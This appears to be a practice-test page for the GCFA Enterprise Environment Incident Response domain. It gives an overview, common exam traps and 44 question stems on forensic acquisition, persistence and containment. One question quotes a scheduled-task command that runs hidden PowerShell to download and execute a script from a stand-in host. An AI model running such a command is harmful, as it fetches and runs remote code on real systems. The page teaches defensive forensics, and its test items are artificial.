GCFA · domain
Enterprise Environment Incident Response
This GCFA domain covers incident response across enterprise networks and cloud services: triaging compromised Windows and Linux hosts, preserving volatile and non-volatile evidence, containing active threats without destroying data, and reconstructing adversary activity from logs and artifacts. Questions present realistic scenarios and ask you to choose the correct acquisition, containment, or analysis action.
Focused practice
Practice Enterprise Environment Incident Response questions
Scored sessions drawing only from this domain — pick a length below.
Start 20-question practice test →What this domain covers
What to know about Enterprise Environment Incident Response
Be able to select the right acquisition and containment method for a live enterprise system, then pivot across Windows, Linux, and cloud artifacts to reconstruct the intrusion. The single most important thing: preserve volatile evidence before shutting anything down.
Live memory acquisition on running Windows servers using tools like WinPmem or FTK Imager
Analyzing Linux authentication logs such as /var/log/auth.log and journalctl for SSH brute-force and successful logins
Identifying cloud email compromise artifacts including mailbox forwarding rules and audit logs
Containment decisions that stop ransomware spread while preserving forensic evidence on file servers
Watch out for
Common Enterprise Environment Incident Response exam traps
- ▸Assuming a full disk image is always required; volatile memory and live system state may be lost if the host is powered off first.
- ▸Overlooking cloud-side evidence like mailbox forwarding rules or audit logs because focus stays on endpoint artifacts.
- ▸Containing too aggressively by wiping or rebuilding systems, destroying evidence needed to determine scope and root cause.
Question index
All Enterprise Environment Incident Response questions (44)
Click any question to see the full explanation, or start a practice session above.
During an enterprise incident, your team identifies that an attacker has deployed a ransomware variant that encrypts files on a critical file server. The attacker also exfiltrated sensitive data before encryption. Which of the following best describes the appropriate containment strategy?
Medium2Refer to the exhibit. An attacker attempts to use a compromised identity with this policy to modify a file in the 'sensitive-data' bucket. What is the expected outcome?
Medium3Which THREE activities are considered best practices when preserving evidence from a cloud-based environment during an incident?
Hard4When investigating a suspected data exfiltration incident, which TWO sources are most useful for determining the volume and destination of the transferred data?
Medium5Refer to the exhibit. An investigator observes the listed network connections on a compromised server. Which process warrants immediate investigation based on these connections?
Medium6An attacker is using a living-off-the-land (LotL) technique to execute commands on a Linux server. Which log source is most likely to reveal the command-line arguments used?
Medium7Why is it important to include non-security personnel, such as legal counsel and HR, in the incident response process for a significant data breach?
Medium8An incident responder is investigating a compromised Windows system and finds that the attacker used a technique known as 'process hollowing' to hide malicious code. Which of the following best describes how process hollowing works?
Hard9An incident responder is analyzing a compromised Windows server and suspects that an attacker used a scheduled task to maintain persistence. The responder runs 'schtasks /query /fo LIST /v' and sees a task named 'Updater' with a trigger set to run every hour. The task's action is 'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://malicious.com/script.ps1')"'. Which of the following best describes the attacker's technique?
Hard10An enterprise incident responder is analyzing a compromised Windows 10 workstation. The attacker used a scheduled task to maintain persistence. The responder runs 'schtasks /query /fo LIST /v' and sees a task named 'Updater' with the action 'C:\Windows\Temp\svchost.exe'. However, the file svchost.exe is not present in that directory. Which of the following best explains why the task still appears and what should the responder do next?
Hard11An enterprise incident response team is preparing to conduct a forensic investigation on a compromised Linux server. The server is still running and cannot be taken offline. Which TWO of the following commands are appropriate for collecting volatile network connection information while minimizing disruption to the system? (Choose two.)
Medium12During an enterprise incident, you discover that an attacker modified the Windows event log service to record only selected events, effectively hiding malicious activity. Which Windows artifact should you analyze first to determine what modifications were made to the logging configuration?
Medium13An organization discovers that an attacker is using 'Living off the Land' (LotL) binaries to execute malicious code. Why are LotL attacks particularly difficult to detect in an enterprise environment?
Hard14During an incident response engagement, you discover that an attacker has compromised a Windows server and established persistence by creating a new Windows service. The service is configured to run a malicious executable at system startup. Which of the following registry locations would you examine to find the configuration of this service?
Hard15During a response to an incident involving a web shell, you find that the attacker is using custom encoding to bypass WAF signatures. What is the best forensic approach to identify all impacted web files?
Hard16During an enterprise incident response, you are tasked with collecting volatile evidence from a compromised Windows workstation. Which two of the following are considered best practices for preserving volatile data? (Choose two.)
Medium17An organization is deploying an EDR solution to improve incident response capabilities. What is the most critical factor to consider when configuring EDR policies for a production environment?
Medium18An organization detects a sophisticated adversary attempting to move laterally using Pass-the-Hash (PtH) techniques. Which THREE of the following configurations or practices are most effective at mitigating this risk?
Hard19An organization is deploying an EDR solution across a hybrid environment. Which TWO of the following tasks are critical for ensuring effective incident response visibility?
Hard20During an enterprise incident response, you are examining a compromised Windows system and suspect the attacker used a rootkit to hide a malicious service. You have obtained a memory image and a disk image. Which of the following techniques is most effective for detecting a hidden service that is not visible through standard API calls?
Hard21An incident responder is reviewing EDR alerts and discovers an 'Account Manipulation' event. What is the most common reason why an attacker would target the 'Domain Admins' group during the post-exploitation phase?
Medium22During an enterprise-wide incident response, a Windows workstation is suspected of being compromised by a threat actor who used a spear-phishing document. The machine is still powered on and the user is logged in. You need to capture volatile evidence in a forensically sound manner. Which of the following is the correct order of volatility for collecting evidence, from most volatile to least volatile?
Medium23During a cloud-based incident, you determine that an attacker has gained access to an IAM role with excessive permissions. What is the most effective containment step to minimize the blast radius without causing immediate service outages?
Medium24Which phase of the incident response lifecycle is most directly responsible for ensuring that an enterprise environment is returned to a secure, verified state after an intrusion?
Medium25An incident responder is investigating a compromised Windows server. The attacker gained access via a Remote Desktop Protocol (RDP) brute-force attack and then created a new local user account for persistence. The responder needs to identify evidence of the newly created account and any subsequent logon activity. Which TWO of the following Windows artifacts should the responder examine to find this evidence? (Choose two.)
Medium26Which of the following describes the 'Principle of Least Privilege' applied to incident response accounts?
Medium27An enterprise incident responder is analyzing a compromised Linux server. The attacker used a rootkit that hooks system calls to hide processes and files. Which forensic technique is most effective to detect the rootkit's presence and identify hidden processes?
Hard28During an enterprise incident response, you need to collect volatile evidence from a compromised Windows server that is still powered on. The server is business-critical and cannot be taken offline. Which of the following is the most appropriate order for collecting volatile data, according to RFC 3227 guidelines?
Medium29An incident responder is analyzing a compromised Windows 10 workstation. The attacker used a technique to execute code in the context of a legitimate process by injecting a malicious DLL into it. Which of the following Windows artifacts would BEST provide evidence of this specific technique?
Hard30During an enterprise incident response, you need to triage a compromised Windows host to determine if an adversary established persistence via a malicious service. Which artifact should you examine first to identify the service name, binary path, and start type?
Medium31A large enterprise is responding to a ransomware incident. The adversary has deployed malware that encrypts files and deletes volume shadow copies. The incident response team needs to determine the initial infection vector and the scope of the compromise. They have collected logs from various sources. Which of the following log sources is MOST likely to contain evidence of the initial infection vector if the adversary used a phishing email with a malicious attachment?
Hard32An enterprise incident response team is handling a breach where the adversary used valid credentials to access a cloud-hosted email service and created a mailbox forwarding rule to exfiltrate messages. The team has identified the compromised account and wants to determine the full scope of mailbox access and rule creation across the tenant. Which single action should the responder take to obtain the authoritative audit record of these activities?
Medium33During an enterprise incident response, you are examining evidence on a Windows Server 2019 system that may contain a fileless malware infection. You need to determine whether a specific process was injected with malicious code. Which Windows forensic artifact is most directly useful for identifying anomalous memory regions in a process, such as those created by reflective DLL injection?
Medium34An organization's incident response plan includes a requirement to maintain chain of custody for all digital evidence. A security analyst collects a USB drive from a compromised workstation. Which of the following is the MOST critical action to perform to ensure the evidence is admissible in a court of law?
Easy35An incident responder is preparing to acquire a forensic image of a running Windows server that is suspected of being compromised. The server hosts a critical database that cannot be taken offline. Which method is most appropriate for acquiring the disk image while minimizing disruption?
Easy36During an enterprise incident response involving a compromised Windows server, you need to acquire volatile evidence in a forensically sound manner. Which TWO of the following actions should be performed first to preserve the most volatile data? (Choose two.)
Medium37During an incident response engagement, you need to establish a timeline of adversary activity on a compromised Windows server. Which data source is most appropriate for correlating user logon events, service installations, and process executions?
Easy38An enterprise incident response team is preparing to contain a confirmed ransomware outbreak that has already encrypted several file servers. The team must preserve forensic evidence while stopping further spread. Which two actions best balance evidence preservation with containment in this scenario? (Choose two.)
Medium39An incident responder is reviewing logs from a compromised Linux server and notices a large number of failed SSH login attempts from a single external IP address, followed by a successful login. Which of the following best describes this activity?
Easy40An incident responder is analyzing a compromised Windows 10 workstation in an enterprise environment. The adversary used a known malware family that injects code into a legitimate process and then clears the associated event log entries to hinder detection. The responder has a memory image captured from the live system and a disk image acquired afterward. Which artifact in the memory image is most likely to reveal the injected code region and its originating module, even if the on-disk executable was deleted?
Hard41An incident responder is analyzing a Linux server that was compromised. The attacker gained initial access via SSH and then created a new user account named 'support' with UID 0. Which command should the responder use to quickly identify all accounts with UID 0 on the system?
Easy42During a post-incident review, a team realizes they missed a critical indicator of compromise (IOC) because they did not normalize their log data. What is the primary benefit of log normalization in an enterprise incident response environment?
Medium43Which technique is commonly used by attackers to maintain persistence on a Windows system that specifically targets the login process?
Medium44An organization is responding to a ransomware incident. The attackers encrypted files on several servers and left a ransom note. Which immediate action should the incident response team take to preserve the most volatile evidence before shutting down the affected systems?
EasyOther domains
All GCFA exam domains
Frequently asked questions
- What does the Enterprise Environment Incident Response domain cover on the GCFA exam?
- Be able to select the right acquisition and containment method for a live enterprise system, then pivot across Windows, Linux, and cloud artifacts to reconstruct the intrusion. The single most important thing: preserve volatile evidence before shutting anything down.
- How many questions are in this domain?
- This page lists all 44 Enterprise Environment Incident Response questions in the GCFA question bank. The actual exam draws from this domain proportionally to its weighting in the official exam blueprint.
- What is the best way to practise this domain?
- Start with a short focused session (10 questions) to identify gaps, then work through explanations. Repeat with a longer session once the weak areas feel solid.
- Can I practise only Enterprise Environment Incident Response questions?
- Yes — the session launcher on this page filters questions to this domain only. Choose any session length for inline explanations and scoring.